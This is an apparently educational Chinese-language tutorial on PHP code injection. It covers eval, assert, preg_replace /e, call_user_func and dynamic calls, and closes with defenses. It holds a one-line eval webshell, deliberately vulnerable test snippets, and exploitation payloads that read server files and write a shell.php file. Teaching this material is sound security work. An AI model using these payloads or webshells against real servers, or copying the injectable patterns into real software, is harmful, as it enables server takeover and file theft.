PHP 代码注入漏洞

文章目录

• PHP 代码注入
• • 原理及成因
  • 漏洞危害
  • 相关函数和语句
  • • eval()语言结构
    • assert()函数
    • preg_replace()函数
    • call_user_func()函数
    • 动态函数`$a($b)`
  • 漏洞利用
  • 防御方法

PHP 代码注入

PHP 代码注入 属于代码注入漏洞中的一种。

原理及成因

PHP 代码执行（注入）是指（Web 方面）应用程序过滤不严，用户可以通过请求将代码注入到应用中执行。代码执行（注入)类似于SQL注入漏洞，SQLi是将SQL语句注入到数据库中执行，而代码执行则是可以把代码注入到应用中最终由服务器运行它。这样的漏洞如果没有特殊的过滤，相当于直接有一个web后门的存在。

1. 程序中含有可以执行php 代码的函数或者语言结构
2. 传入第一点中的参数，客户端可控，直接修改或者影响

漏洞危害

Web 应用如果存在代码执行漏洞是一件非常可怕的事情，就像一个人没有穿衣服，赤裸裸的暴露在光天化日之下。可以通过代码执行漏洞继承Web 用户权限，执行任意代码。如果具有服务器没有正确配置，Web 用户权限比较高的话，我们可以读写目标服务器任意文件内容，甚至控制整个网站以及服务器。

PHP 中有很多函数和语句都会造成PHP代码执行漏洞。

相关函数和语句

eval()语言结构

将传进来的字符串当作php代码执行，里面的参数必须加分号才能执行！

例如：一句话木马

<?php
if(isset($_REQUEST['code'])){
	eval($_REQUEST['code']);
}
?>
           

assert()函数

将传进来的字符串当作php代码执行，可以不用加分号就能执行！

<?php
if(@isset($_REQUEST['code'])){
 @assert($_REQUEST['code']);
}
?>
           

preg_replace()函数

对字符串进行正则处理

参数和返回值如下：

mixed preg_replace(mixed $pattern,mixed $replacement,mixed $subject [,int limit = -1[,int &$count)1)

原理：在subject中搜索匹配pattern正则表达式的部分用replacment来替换，当pattern参数存在/e 修饰符时，会将replacment的值当作php 代码执行。

<?php
if(isset($_GET['code'])) {
$code=$_GET['code'];
preg_replace( "/\[(.*)\]/e",'\\1',$code);
// 匹配[]里面的内容，\\1代表正则第一次匹配的内容
}
?>
           

call_user_func()函数

call_user_func( )等函数都有调用其他函数的功能，其中的第一个参数作为要调用的函数名（回调函数），第二个参数为回调函数的参数，那如果这个传入的函数名可控，那就可以调用意外的函数来执行我们想要的代码，也就是存在任意代码执行漏洞。

以call_user_func()为例子，该函数的第一个参数作为回调函数，后面的参数为回调函数的参数，测试代码如下：

<?php
if(isset($_GET['fun'])) {
 $fun=$_GET['fun'];//assert
 $para=$_GET['para'];//phpinfo();
 call_user_func($fun,$para);//eval(phpinfo();)
}
?>
           

动态函数

$a($b)

由于PHP的特性原因，PHP的函数支持直接由拼接的方式调用，这直接导致了PHP在安全上的控制有加大了难度。不少知名程序中也用到了动态函数的写法，这种写法跟使用call_user_func()的初衷一样，用来更加方便地调用函数，但是一旦过滤不严格就会造成代码执行漏洞。测试代码如下:

<?php
if(isset($_GET['a'])) {
 $a=$_GET['a'];
 $b=$_GET['b'];
 $a($b);
}
?>
           

漏洞利用

1. 直接获取shell

   一句话木马使用菜刀或者蚁剑连接即可。

2. 获取当前文件的绝对路径

   __FILE__

   是PHP预定义常量，其含义当前文件的路径。提交代码

   ?code=print(__FILE__);

   

3. 读文件

   我们可以利用file_get_contents(）函数读取服务器任意文件，前提是知道目标文件路径和具有读取权限。提交代码

   ?code=var_dump(file_get_contents( 'c:\windows\system32\drivers\etc\hosts'));

   读取服务器hosts文件。

   

4. 写文件

   我们可以利用file_put_contents()函数，写入文件。前提是知道可写目录。

   提交代码

   ?code=var_dump(file_put_contents($_POST[1],$_POST[2]));

   第一个参数是文件名，第二个参数是文件内容，此时需要借助于hackbar通过post 方式提交参数

   1=shell.php&2=<?php phpinfo()?>

   即可在当前目录下创建一个shell.php文件。

   

   

防御方法

1. 尽量不要使用eval等函数
2. 如果使用的话一定要进行严格的过滤
3. preg_replace放弃使用/e修饰符
4. 禁用函数，修改配置文件php.ini里的 disable functions = 要禁用的函数